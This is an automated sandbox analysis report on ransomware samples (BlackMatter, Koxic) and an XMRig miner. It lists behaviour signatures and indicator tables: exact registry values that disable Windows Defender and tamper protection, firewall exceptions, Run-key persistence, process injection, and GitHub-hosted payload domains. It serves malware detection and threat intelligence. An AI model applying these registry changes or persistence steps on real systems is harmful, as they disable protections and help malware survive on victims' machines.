Analysis Overview
Threat Level: Known bad
The file https://github.com/Pyran1/MalwareDatabase/tree/master/Ransomware was found to be: Known bad.
Malicious Activity Summary
xmrig
Blackmatter family
Koxic family
Modifies firewall policy service
Xmrig family
Modifies Windows Defender DisableAntiSpyware settings
Koxic
BlackMatter Ransomware
Modifies Windows Defender Real-time Protection settings
XMRig Miner payload
Renames multiple (615) files with added filename extension
Drops file in Drivers directory
Disables taskbar notifications via registry modification
Executes dropped EXE
Checks computer location settings
Modifies file permissions
Drops startup file
Windows security modification
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Obfuscated Files or Information: Command Obfuscation
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Opens file in notepad (likely ransom note)
Scheduled Task/Job: Scheduled Task
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Modifies Control Panel
Uses Task Scheduler COM API
Enumerates system info in registry
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-26 05:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-26 05:03
Reported
2025-02-26 05:21
Platform
win10v2004-20250217-en
Max time kernel
1039s
Max time network
1039s
Command Line
Signatures
BlackMatter Ransomware
Blackmatter family
Koxic
Koxic family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383a = "C:\\Users\\Admin\\Downloads\\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe:*:enabled:@shell32.dll,-1" | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
Xmrig family
xmrig
Renames multiple (615) files with added filename extension
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables taskbar notifications via registry modification
Drops file in Drivers directory
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\rtksmbs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\rtksmbs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\serverpatch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\serverpatch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\rtksmbs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\rtksmbs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\serverpatch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xmrmine.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\appdata\roaming\serverpatch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\zqawds.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\zqawds.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\etcmin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\zqawds.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pUKKXbtdAP.url | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\pukkxbtdap.url | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\pukkxbtdap.url | C:\Windows\system32\taskmgr.exe | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1" | C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\309083e1-c7ce-4856-8974-714ff3572443\\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe\" --AutoStart" | C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\apo5 = "C:\\Program Files (x86)\\win\\msn.exe" | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MuyRestore = "C:\\Users\\Admin\\AppData\\Roaming\\\\MuyRestore.exe" | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MuyRestore = "C:\\Users\\Admin\\AppData\\Roaming\\\\MuyRestore.exe" | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini | C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Sets desktop wallpaper using registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5152 set thread context of 3592 | N/A | C:\Users\Admin\appdata\roaming\serverpatch.exe | C:\Windows\explorer.exe |
| PID 5020 set thread context of 4268 | N/A | C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe | C:\Windows\explorer.exe |
| PID 3060 set thread context of 1468 | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE |
| PID 4316 set thread context of 5660 | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\win | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| File created | C:\Program Files (x86)\win\msn.exe | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
| File opened for modification | C:\Program Files (x86)\win\msn.exe | C:\Users\Admin\Downloads\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6\6cf3080c47ca675e91009ee2b5d860a383aa77e6eac870de15f59d71407f08d6.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "846" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
